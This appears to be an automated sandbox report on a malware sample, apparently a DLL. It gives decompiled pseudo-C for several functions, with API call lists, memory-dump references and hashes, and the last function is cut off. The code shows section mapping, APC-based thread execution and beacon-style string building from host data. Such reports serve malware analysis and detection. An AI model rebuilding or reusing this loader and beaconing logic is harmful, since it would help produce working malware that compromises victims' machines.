                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 005F10BA, Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 68%
                                          			E005F10BA(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}







                                          0x005f10cc
                                          0x005f10d2
                                          0x005f10e0
                                          0x005f10e7
                                          0x005f10ec
                                          0x005f10f2
                                          0x00000000
                                          0x005f10f3
                                          0x00000000

                                          APIs
                                          • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,005F1AA6,00000002,00000000,?,?,00000000,?,?,005F1AA6,00000002), ref: 005F10E7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.519649525.00000000005F0000.00000040.00020000.sdmp, Offset: 005F0000, based on PE: true
                                          • Associated: 00000000.00000002.519749348.00000000005F5000.00000040.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.519817057.00000000005F7000.00000040.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5f0000_loaddll32.jbxd
                                          Similarity
                                          • API ID: SectionView
                                          • String ID:
                                          • API String ID: 1323581903-0
                                          • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                          • Instruction ID: bb02ecbb7f4678283118c8a6b0c316bea3d9c0848fb7b7190302679ddacbd0dc
                                          • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                          • Instruction Fuzzy Hash: 00F012B590060DFFDB119FA5CC89CAFBBBDEB44394B104939B252E1090DA309E489A60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C71754, Relevance: 33.2, APIs: 22, Instructions: 248memorystringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 74%
                                          			E00C71754(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				void* _t68;
				intOrPtr _t69;
				int _t72;
				void* _t73;
				void* _t74;
				void* _t76;
				void* _t79;
				intOrPtr _t83;
				intOrPtr _t87;
				intOrPtr* _t89;
				intOrPtr _t95;
				void* _t97;
				intOrPtr _t104;
				signed int _t108;
				char** _t110;
				int _t113;
				signed int _t115;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr* _t120;
				intOrPtr* _t122;
				intOrPtr _t125;
				intOrPtr _t130;
				int _t134;
				CHAR* _t136;
				intOrPtr _t137;
				void* _t138;
				void* _t147;
				int _t148;
				void* _t149;
				intOrPtr _t150;
				void* _t152;
				long _t156;
				intOrPtr* _t157;
				intOrPtr* _t158;
				intOrPtr* _t161;
				void* _t162;
				void* _t164;

				_t147 = __edx;
				_t138 = __ecx;
				_t60 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t60 = GetTickCount();
				}
				_t61 =  *0xc7d018; // 0x3df0b315
				asm("bswap eax");
				_t62 =  *0xc7d014; // 0x3a87c8cd
				_t136 = _a16;
				asm("bswap eax");
				_t63 =  *0xc7d010; // 0xd8d2f808
				asm("bswap eax");
				_t64 =  *0xc7d00c; // 0x8f8f86c2
				asm("bswap eax");
				_t65 =  *0xc7d2a4; // 0x24ba5a8
				_t3 = _t65 + 0xc7e633; // 0x74666f73
				_t148 = wsprintfA(_t136, _t3, 3, 0x3d137, _t64, _t63, _t62, _t61,  *0xc7d02c,  *0xc7d004, _t60);
				_t68 = E00C757AB();
				_t69 =  *0xc7d2a4; // 0x24ba5a8
				_t4 = _t69 + 0xc7e673; // 0x74707526
				_t72 = wsprintfA(_t148 + _t136, _t4, _t68);
				_t164 = _t162 + 0x38;
				_t149 = _t148 + _t72; // executed
				_t73 = E00C773E9(_t138); // executed
				_t137 = __imp__;
				_v8 = _t73;
				if(_t73 != 0) {
					_t130 =  *0xc7d2a4; // 0x24ba5a8
					_t7 = _t130 + 0xc7e8cb; // 0x736e6426
					_t134 = wsprintfA(_a16 + _t149, _t7, _t73);
					_t164 = _t164 + 0xc;
					_t149 = _t149 + _t134;
					HeapFree( *0xc7d238, 0, _v8);
				}
				_t74 = E00C7614A();
				_v8 = _t74;
				if(_t74 != 0) {
					_t125 =  *0xc7d2a4; // 0x24ba5a8
					_t11 = _t125 + 0xc7e8d3; // 0x6f687726
					wsprintfA(_t149 + _a16, _t11, _t74);
					_t164 = _t164 + 0xc;
					HeapFree( *0xc7d238, 0, _v8);
				}
				_t150 =  *0xc7d324; // 0x31395b0
				_t76 = E00C7757B(0xc7d00a, _t150 + 4);
				_t156 = 0;
				_v20 = _t76;
				if(_t76 == 0) {
					L26:
					RtlFreeHeap( *0xc7d238, _t156, _a16); // executed
					return _v12;
				} else {
					_t79 = RtlAllocateHeap( *0xc7d238, 0, 0x800);
					_v8 = _t79;
					if(_t79 == 0) {
						L25:
						HeapFree( *0xc7d238, _t156, _v20);
						goto L26;
					}
					E00C7749F(GetTickCount());
					_t83 =  *0xc7d324; // 0x31395b0
					__imp__(_t83 + 0x40);
					asm("lock xadd [eax], ecx");
					_t87 =  *0xc7d324; // 0x31395b0
					__imp__(_t87 + 0x40);
					_t89 =  *0xc7d324; // 0x31395b0
					_t152 = E00C74D2C(1, _t147, _a16,  *_t89);
					_v28 = _t152;
					asm("lock xadd [eax], ecx");
					if(_t152 == 0) {
						L24:
						HeapFree( *0xc7d238, _t156, _v8);
						goto L25;
					}
					StrTrimA(_t152, 0xc7c294);
					_t95 =  *0xc7d2a4; // 0x24ba5a8
					_push(_t152);
					_t18 = _t95 + 0xc7e252; // 0x616d692f
					_t97 = E00C79DEF(_t18);
					_v16 = _t97;
					if(_t97 == 0) {
						L23:
						HeapFree( *0xc7d238, _t156, _t152);
						goto L24;
					}
					_t157 = __imp__;
					 *_t157(_t152, _a4);
					 *_t157(_v8, _v20);
					_t158 = __imp__;
					 *_t158(_v8, _v16);
					 *_t158(_v8, _t152);
					_t104 = E00C7A5E9(0, _v8);
					_a4 = _t104;
					if(_t104 == 0) {
						_v12 = 8;
						L21:
						E00C76106();
						L22:
						HeapFree( *0xc7d238, 0, _v16);
						_t156 = 0;
						goto L23;
					}
					_t108 = E00C72F2A(_t137, 0xffffffffffffffff, _t152,  &_v24); // executed
					_v12 = _t108;
					if(_t108 == 0) {
						_t161 = _v24;
						_t115 = E00C7A060(_t161, _a4, _a8, _a12); // executed
						_v12 = _t115;
						_t116 =  *((intOrPtr*)(_t161 + 8));
						 *((intOrPtr*)( *_t116 + 0x80))(_t116);
						_t118 =  *((intOrPtr*)(_t161 + 8));
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						_t120 =  *((intOrPtr*)(_t161 + 4));
						 *((intOrPtr*)( *_t120 + 8))(_t120);
						_t122 =  *_t161;
						 *((intOrPtr*)( *_t122 + 8))(_t122);
						E00C7147E(_t161);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t110 = _a8;
							if(_t110 != 0) {
								_t153 =  *_t110;
								_t159 =  *_a12;
								wcstombs( *_t110,  *_t110,  *_a12);
								_t113 = E00C71600(_t153, _t153, _t159 >> 1);
								_t152 = _v28;
								 *_a12 = _t113;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E00C7147E(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}























































                                          0x00c71754
                                          0x00c71754
                                          0x00c71754
                                          0x00c7175d
                                          0x00c71766
                                          0x00c71768
                                          0x00c71768
                                          0x00c71775
                                          0x00c71780
                                          0x00c71783
                                          0x00c71788
                                          0x00c71791
                                          0x00c71794
                                          0x00c71799
                                          0x00c7179c
                                          0x00c717a1
                                          0x00c717a4
                                          0x00c717b0
                                          0x00c717bd
                                          0x00c717bf
                                          0x00c717c5
                                          0x00c717ca
                                          0x00c717d5
                                          0x00c717d7
                                          0x00c717da
                                          0x00c717dc
                                          0x00c717e1
                                          0x00c717e7
                                          0x00c717ec
                                          0x00c717ef
                                          0x00c717f4
                                          0x00c71801
                                          0x00c71803
                                          0x00c71809
                                          0x00c71813
                                          0x00c71813
                                          0x00c71815
                                          0x00c7181a
                                          0x00c7181f
                                          0x00c71822
                                          0x00c71827
                                          0x00c71834
                                          0x00c71836
                                          0x00c71844
                                          0x00c71844
                                          0x00c71846
                                          0x00c71854
                                          0x00c71859
                                          0x00c7185b
                                          0x00c71860
                                          0x00c71a2f
                                          0x00c71a39
                                          0x00c71a42
                                          0x00c71866
                                          0x00c71872
                                          0x00c71878
                                          0x00c7187d
                                          0x00c71a23
                                          0x00c71a2d
                                          0x00000000
                                          0x00c71a2d
                                          0x00c71889
                                          0x00c7188e
                                          0x00c71897
                                          0x00c718a8
                                          0x00c718ac
                                          0x00c718b5
                                          0x00c718bb
                                          0x00c718ca
                                          0x00c718d1
                                          0x00c718da
                                          0x00c718e0
                                          0x00c71a17
                                          0x00c71a21
                                          0x00000000
                                          0x00c71a21
                                          0x00c718ec
                                          0x00c718f2
                                          0x00c718f7
                                          0x00c718f8
                                          0x00c718ff
                                          0x00c71904
                                          0x00c71909
                                          0x00c71a0d
                                          0x00c71a15
                                          0x00000000
                                          0x00c71a15
                                          0x00c71912
                                          0x00c71919
                                          0x00c71921
                                          0x00c71926
                                          0x00c7192f
                                          0x00c71935
                                          0x00c7193c
                                          0x00c71941
                                          0x00c71946
                                          0x00c71a45
                                          0x00c719f9
                                          0x00c719f9
                                          0x00c719fe
                                          0x00c71a09
                                          0x00c71a0b
                                          0x00000000
                                          0x00c71a0b
                                          0x00c71950
                                          0x00c71955
                                          0x00c7195a
                                          0x00c7195f
                                          0x00c7196a
                                          0x00c7196f
                                          0x00c71972
                                          0x00c71978
                                          0x00c7197e
                                          0x00c71984
                                          0x00c71987
                                          0x00c7198d
                                          0x00c71990
                                          0x00c71995
                                          0x00c71999
                                          0x00c71999
                                          0x00c719a5
                                          0x00c719b1
                                          0x00c719b5
                                          0x00c719b7
                                          0x00c719bc
                                          0x00c719be
                                          0x00c719c3
                                          0x00c719c8
                                          0x00c719d5
                                          0x00c719dd
                                          0x00c719e0
                                          0x00c719e0
                                          0x00c719bc
                                          0x00000000
                                          0x00c719a7
                                          0x00c719ab
                                          0x00c719e2
                                          0x00c719e5
                                          0x00c719ee
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00c719ee
                                          0x00c719ad
                                          0x00000000
                                          0x00c719ad
                                          0x00c719a5

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 00C71768
                                          • wsprintfA.USER32 ref: 00C717B8
                                          • wsprintfA.USER32 ref: 00C717D5
                                          • wsprintfA.USER32 ref: 00C71801
                                          • HeapFree.KERNEL32(00000000,?), ref: 00C71813
                                          • wsprintfA.USER32 ref: 00C71834
                                          • HeapFree.KERNEL32(00000000,?), ref: 00C71844
                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00C71872
                                          • GetTickCount.KERNEL32 ref: 00C71883
                                          • RtlEnterCriticalSection.NTDLL(03139570), ref: 00C71897
                                          • RtlLeaveCriticalSection.NTDLL(03139570), ref: 00C718B5
                                            • Part of subcall function 00C74D2C: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,00C752FE,?,031395B0), ref: 00C74D57
                                            • Part of subcall function 00C74D2C: lstrlen.KERNEL32(?,?,?,00C752FE,?,031395B0), ref: 00C74D5F
                                            • Part of subcall function 00C74D2C: strcpy.NTDLL ref: 00C74D76
                                            • Part of subcall function 00C74D2C: lstrcat.KERNEL32(00000000,?), ref: 00C74D81
                                            • Part of subcall function 00C74D2C: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00C752FE,?,031395B0), ref: 00C74D9E
                                          • StrTrimA.SHLWAPI(00000000,00C7C294,?,031395B0), ref: 00C718EC
                                            • Part of subcall function 00C79DEF: lstrlen.KERNEL32(?,00000000,00000000,00C75335,616D692F,00000000), ref: 00C79DFB
                                            • Part of subcall function 00C79DEF: lstrlen.KERNEL32(?), ref: 00C79E03
                                            • Part of subcall function 00C79DEF: lstrcpy.KERNEL32(00000000,?), ref: 00C79E1A
                                            • Part of subcall function 00C79DEF: lstrcat.KERNEL32(00000000,?), ref: 00C79E25
                                          • lstrcpy.KERNEL32(00000000,?), ref: 00C71919
                                          • lstrcpy.KERNEL32(?,?), ref: 00C71921
                                          • lstrcat.KERNEL32(?,?), ref: 00C7192F
                                          • lstrcat.KERNEL32(?,00000000), ref: 00C71935
                                            • Part of subcall function 00C7A5E9: lstrlen.KERNEL32(?,00000000,00C7D330,00000001,00C7937A,00C7D00C,00C7D00C,00000000,00000005,00000000,00000000,?,?,?,00C7207E,?), ref: 00C7A5F2
                                            • Part of subcall function 00C7A5E9: mbstowcs.NTDLL ref: 00C7A619
                                            • Part of subcall function 00C7A5E9: memset.NTDLL ref: 00C7A62B
                                          • wcstombs.NTDLL ref: 00C719C8
                                            • Part of subcall function 00C7A060: SysAllocString.OLEAUT32(?), ref: 00C7A09B
                                            • Part of subcall function 00C7A060: IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 00C7A11E
                                            • Part of subcall function 00C7147E: HeapFree.KERNEL32(00000000,00000000,00C71D11,00000000,?,?,-00000008), ref: 00C7148A
                                          • HeapFree.KERNEL32(00000000,?,?), ref: 00C71A09
                                          • HeapFree.KERNEL32(00000000,00000000,616D692F,00000000), ref: 00C71A15
                                          • HeapFree.KERNEL32(00000000,?,?,031395B0), ref: 00C71A21
                                          • HeapFree.KERNEL32(00000000,?), ref: 00C71A2D
                                          • RtlFreeHeap.NTDLL(00000000,?), ref: 00C71A39
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                                          • String ID:
                                          • API String ID: 603507560-0
                                          • Opcode ID: a70d1d72d259f9ffd283e22dc4bd5073000ccb40243d23141296514a34559029
                                          • Instruction ID: 9793a86cd602b3a2f3c6f41a75d787780a3e4d024e73322267bacf5c8ed21b28
                                          • Opcode Fuzzy Hash: a70d1d72d259f9ffd283e22dc4bd5073000ccb40243d23141296514a34559029
                                          • Instruction Fuzzy Hash: 90910671900109AFCB119FA8DC89BAE7BB9EF48350F158054F90EA7261DB31DD92DB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 005F11D4, Relevance: 22.6, APIs: 15, Instructions: 112threadsleepsynchronizationCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 97 5f11d4-5f11e7 call 5f179c 100 5f11ed 97->100 101 5f1306-5f1308 97->101 102 5f11ee-5f1216 SwitchToThread call 5f1b6f Sleep 100->102 105 5f1218-5f121a 102->105 106 5f1305 105->106 107 5f1220-5f1224 105->107 106->101 108 5f127a-5f129a CreateThread 107->108 109 5f1226-5f1231 call 5f130b 107->109 110 5f129c-5f12b4 QueueUserAPC 108->110 111 5f12f5-5f12f7 GetLastError 108->111 118 5f1274 109->118 119 5f1233-5f1244 GetLongPathNameW 109->119 113 5f12b6-5f12cb GetLastError TerminateThread CloseHandle SetLastError 110->113 114 5f12d1-5f12d3 110->114 116 5f12fa-5f1301 111->116 113->114 114->111 117 5f12d5-5f12e3 WaitForSingleObject 114->117 116->106 120 5f1303 GetLastError 116->120 121 5f12e5-5f12ea GetExitCodeThread 117->121 122 5f12f0-5f12f3 CloseHandle 117->122 118->108 123 5f126a-5f1272 119->123 124 5f1246-5f1257 call 5f1026 119->124 120->106 121->122 122->116 123->108 124->123 127 5f1259-5f1263 GetLongPathNameW call 5f1938 124->127 129 5f1268 127->129 129->108
                                          C-Code - Quality: 85%
                                          			E005F11D4(void* __ecx, void* __edx, void* __edi, long _a4) {
				long _v8;
				void* _v32;
				long _t21;
				long _t23;
				long _t25;
				void* _t26;
				long _t29;
				long _t30;
				long _t34;
				void* _t39;
				intOrPtr _t42;
				void* _t47;
				void* _t52;
				signed int _t55;
				void* _t57;
				intOrPtr* _t58;

				_t47 = __ecx;
				_t21 = E005F179C();
				_v8 = _t21;
				if(_t21 != 0) {
					return _t21;
				}
				do {
					_t55 = SwitchToThread() + 8;
					_t23 = E005F1B6F(__edi, _t55); // executed
					_v8 = _t23;
					Sleep(0x20 + _t55 * 4); // executed
					_t25 = _v8;
				} while (_t25 == 0xc);
				if(_t25 != 0) {
					L21:
					return _t25;
				}
				_push(__edi);
				if(_a4 != 0) {
					L11:
					_t26 = CreateThread(0, 0, __imp__SleepEx,  *0x5f4140, 0, 0); // executed
					_t57 = _t26;
					if(_t57 == 0) {
						L18:
						_v8 = GetLastError();
						L19:
						_t25 = _v8;
						if(_t25 == 0xffffffff) {
							_t25 = GetLastError();
						}
						goto L21;
					}
					_t29 = QueueUserAPC(E005F16E4, _t57,  &_v32); // executed
					if(_t29 == 0) {
						_t34 = GetLastError();
						_a4 = _t34;
						TerminateThread(_t57, _t34);
						CloseHandle(_t57);
						_t57 = 0;
						SetLastError(_a4);
					}
					if(_t57 == 0) {
						goto L18;
					} else {
						_t30 = WaitForSingleObject(_t57, 0xffffffff);
						_v8 = _t30;
						if(_t30 == 0) {
							GetExitCodeThread(_t57,  &_v8);
						}
						CloseHandle(_t57);
						goto L19;
					}
				}
				if(E005F130B(_t47,  &_a4) != 0) {
					 *0x5f4138 = 0;
					goto L11;
				}
				_t58 = __imp__GetLongPathNameW;
				_t39 =  *_t58(_a4, 0, 0); // executed
				_t52 = _t39;
				if(_t52 == 0) {
					L9:
					 *0x5f4138 = _a4;
					goto L11;
				}
				_t10 = _t52 + 2; // 0x2
				_t42 = E005F1026(_t52 + _t10);
				 *0x5f4138 = _t42;
				if(_t42 == 0) {
					goto L9;
				}
				 *_t58(_a4, _t42, _t52); // executed
				E005F1938(_a4);
				goto L11;
			}



















                                          0x005f11d4
                                          0x005f11db
                                          0x005f11e2
                                          0x005f11e7
                                          0x005f1308
                                          0x005f1308
                                          0x005f11ee
                                          0x005f11f6
                                          0x005f11fa
                                          0x005f11ff
                                          0x005f120a
                                          0x005f1210
                                          0x005f1213
                                          0x005f121a
                                          0x005f1305
                                          0x00000000
                                          0x005f1305
                                          0x005f1220
                                          0x005f1224
                                          0x005f127a
                                          0x005f128a
                                          0x005f1290
                                          0x005f129a
                                          0x005f12f5
                                          0x005f12f7
                                          0x005f12fa
                                          0x005f12fa
                                          0x005f1301
                                          0x005f1303
                                          0x005f1303
                                          0x00000000
                                          0x005f1301
                                          0x005f12a6
                                          0x005f12b4
                                          0x005f12b6
                                          0x005f12ba
                                          0x005f12bd
                                          0x005f12c4
                                          0x005f12c9
                                          0x005f12cb
                                          0x005f12cb
                                          0x005f12d3
                                          0x00000000
                                          0x005f12d5
                                          0x005f12d8
                                          0x005f12de
                                          0x005f12e3
                                          0x005f12ea
                                          0x005f12ea
                                          0x005f12f1
                                          0x00000000
                                          0x005f12f1
                                          0x005f12d3
                                          0x005f1231
                                          0x005f1274
                                          0x00000000
                                          0x005f1274
                                          0x005f1233
                                          0x005f123e
                                          0x005f1240
                                          0x005f1244
                                          0x005f126a
                                          0x005f126d
                                          0x00000000
                                          0x005f126d
                                          0x005f1246
                                          0x005f124b
                                          0x005f1250
                                          0x005f1257
                                          0x00000000
                                          0x00000000
                                          0x005f125e
                                          0x005f1263
                                          0x00000000

                                          APIs
                                            • Part of subcall function 005F179C: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,005F11E0), ref: 005F17AB
                                            • Part of subcall function 005F179C: GetVersion.KERNEL32(?,005F11E0), ref: 005F17BA
                                            • Part of subcall function 005F179C: GetCurrentProcessId.KERNEL32(?,005F11E0), ref: 005F17D6
                                            • Part of subcall function 005F179C: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,005F11E0), ref: 005F17EF
                                          • SwitchToThread.KERNEL32 ref: 005F11EE
                                            • Part of subcall function 005F1B6F: VirtualAlloc.KERNELBASE(00000000,-00000008,00003000,00000004,00000000,?,-00000008,-00000008), ref: 005F1BC5
                                            • Part of subcall function 005F1B6F: memcpy.NTDLL(?,?,-00000008,?,?,?,?,?,?,?,?,005F11FF,-00000008), ref: 005F1C57
                                            • Part of subcall function 005F1B6F: VirtualFree.KERNELBASE(?,00000000,00008000), ref: 005F1C72
                                          • Sleep.KERNELBASE(00000000,-00000008), ref: 005F120A
                                          • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 005F123E
                                          • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 005F125E
                                          • CreateThread.KERNEL32 ref: 005F128A
                                          • QueueUserAPC.KERNELBASE(005F16E4,00000000,?), ref: 005F12A6
                                          • GetLastError.KERNEL32 ref: 005F12B6
                                          • TerminateThread.KERNEL32(00000000,00000000), ref: 005F12BD
                                          • CloseHandle.KERNEL32(00000000), ref: 005F12C4
                                          • SetLastError.KERNEL32(?), ref: 005F12CB
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 005F12D8
                                          • GetExitCodeThread.KERNEL32(00000000,?), ref: 005F12EA
                                          • CloseHandle.KERNEL32(00000000), ref: 005F12F1
                                          • GetLastError.KERNEL32 ref: 005F12F5
                                          • GetLastError.KERNEL32 ref: 005F1303
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.519649525.00000000005F0000.00000040.00020000.sdmp, Offset: 005F0000, based on PE: true
                                          • Associated: 00000000.00000002.519749348.00000000005F5000.00000040.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.519817057.00000000005F7000.00000040.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5f0000_loaddll32.jbxd
                                          Similarity
                                          • API ID: ErrorLastThread$CloseCreateHandleLongNamePathProcessVirtual$AllocCodeCurrentEventExitFreeObjectOpenQueueSingleSleepSwitchTerminateUserVersionWaitmemcpy
                                          • String ID:
                                          • API String ID: 3896949738-0
                                          • Opcode ID: 73ae3f1b265303e0a09d3dd145ce4e815f05806366a0c9bad911ed5b14c0b916
                                          • Instruction ID: ab5b8ad78f1ddc4befa915cc0ffbf2c17cdd9400757a20aacc18164cd05155a5
                                          • Opcode Fuzzy Hash: 73ae3f1b265303e0a09d3dd145ce4e815f05806366a0c9bad911ed5b14c0b916
                                          • Instruction Fuzzy Hash: A9315E7590051DFBDB10AFA5DC888BE7EACFA283947104526FA05D3110EB389E45EBA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C79B6F, Relevance: 16.7, APIs: 11, Instructions: 152timememoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 130 c79b6f-c79ba1 memset CreateWaitableTimerA 131 c79ba7-c79c00 _allmul SetWaitableTimer WaitForMultipleObjects 130->131 132 c79d23-c79d29 GetLastError 130->132 133 c79c06-c79c09 131->133 134 c79c8b-c79c91 131->134 135 c79d2d-c79d37 132->135 136 c79c14 133->136 137 c79c0b call c768cf 133->137 138 c79c92-c79c96 134->138 142 c79c1e 136->142 143 c79c10-c79c12 137->143 140 c79ca6-c79caa 138->140 141 c79c98-c79ca0 HeapFree 138->141 140->138 144 c79cac-c79cb6 CloseHandle 140->144 141->140 145 c79c22-c79c27 142->145 143->136 143->142 144->135 146 c79c3a-c79c68 call c79f11 145->146 147 c79c29-c79c30 145->147 151 c79c6a-c79c75 146->151 152 c79cb8-c79cbd 146->152 147->146 148 c79c32 147->148 148->146 151->145 155 c79c77-c79c87 call c754ac 151->155 153 c79cbf-c79cc5 152->153 154 c79cdc-c79ce4 152->154 153->134 156 c79cc7-c79cda call c76106 153->156 157 c79cea-c79d18 _allmul SetWaitableTimer WaitForMultipleObjects 154->157 155->134 156->157 157->145 161 c79d1e 157->161 161->134
                                          C-Code - Quality: 83%
                                          			E00C79B6F(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void _v48;
				long _v52;
				struct %anon52 _v60;
				char _v72;
				long _v76;
				void* _v80;
				union _LARGE_INTEGER _v84;
				struct %anon52 _v92;
				void* _v96;
				void* _v100;
				union _LARGE_INTEGER _v104;
				long _v108;
				intOrPtr _v120;
				struct %anon52 _v128;
				struct %anon52 _t46;
				void* _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				struct %anon52 _t65;
				void* _t68;
				void* _t72;
				signed int _t73;
				void* _t75;
				void* _t78;
				void** _t82;
				signed int _t86;
				void* _t89;

				_t75 = __edx;
				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v60 = _t46;
				if(_t46 == 0) {
					_v92.HighPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0xc7d240);
					_v76 = 0;
					_v80 = 0;
					L00C7B088();
					_v84.LowPart = _t46;
					_v80 = _t75;
					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
					_t51 =  *0xc7d26c; // 0x3e0
					_v76 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
					_v108 = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0xc7d24c = 5;
						} else {
							_t68 = E00C768CF(); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v104.LowPart = 0;
						L6:
						L6:
						if(_v104.LowPart == 1 && ( *0xc7d260 & 0x00000001) == 0) {
							_v104.LowPart = 2;
						}
						_t73 = _v104.LowPart;
						_t58 = _t73 << 4;
						_t78 = _t89 + (_t73 << 4) + 0x3c;
						_t74 = _t73 + 1;
						_v92.LowPart = _t73 + 1;
						_t60 = E00C79F11(_t74, _t78, _t74, _t89 + _t58 + 0x3c, _t78,  &_v96,  &_v100); // executed
						_v128.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v92;
						_v104.LowPart = _t65;
						_t97 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v120 = E00C754AC(_t74, _t97,  &_v72, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0xc7d244);
							goto L21;
						} else {
							__eflags =  *0xc7d248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E00C76106();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0xc7d248);
								L21:
								L00C7B088();
								_v104.LowPart = _t60;
								_v100 = _t78;
								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
								_v128 = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t82 =  &_v72;
					_t72 = 3;
					do {
						_t54 =  *_t82;
						if(_t54 != 0) {
							HeapFree( *0xc7d238, 0, _t54);
						}
						_t82 =  &(_t82[4]);
						_t72 = _t72 - 1;
					} while (_t72 != 0);
					CloseHandle(_v80);
				}
				return _v92.HighPart;
				goto L25;
			}
































                                          0x00c79b6f
                                          0x00c79b85
                                          0x00c79b89
                                          0x00c79b8e
                                          0x00c79b95
                                          0x00c79b9b
                                          0x00c79ba1
                                          0x00c79d29
                                          0x00c79ba7
                                          0x00c79ba7
                                          0x00c79ba9
                                          0x00c79bae
                                          0x00c79baf
                                          0x00c79bb5
                                          0x00c79bb9
                                          0x00c79bbd
                                          0x00c79bcb
                                          0x00c79bd9
                                          0x00c79bdd
                                          0x00c79bdf
                                          0x00c79bec
                                          0x00c79bf8
                                          0x00c79bfa
                                          0x00c79c00
                                          0x00c79c09
                                          0x00c79c14
                                          0x00c79c14
                                          0x00c79c0b
                                          0x00c79c0b
                                          0x00c79c12
                                          0x00000000
                                          0x00000000
                                          0x00c79c12
                                          0x00c79c1e
                                          0x00000000
                                          0x00c79c22
                                          0x00c79c27
                                          0x00c79c32
                                          0x00c79c32
                                          0x00c79c3a
                                          0x00c79c45
                                          0x00c79c4d
                                          0x00c79c56
                                          0x00c79c59
                                          0x00c79c5d
                                          0x00c79c62
                                          0x00c79c68
                                          0x00000000
                                          0x00000000
                                          0x00c79c6a
                                          0x00c79c6e
                                          0x00c79c72
                                          0x00c79c75
                                          0x00000000
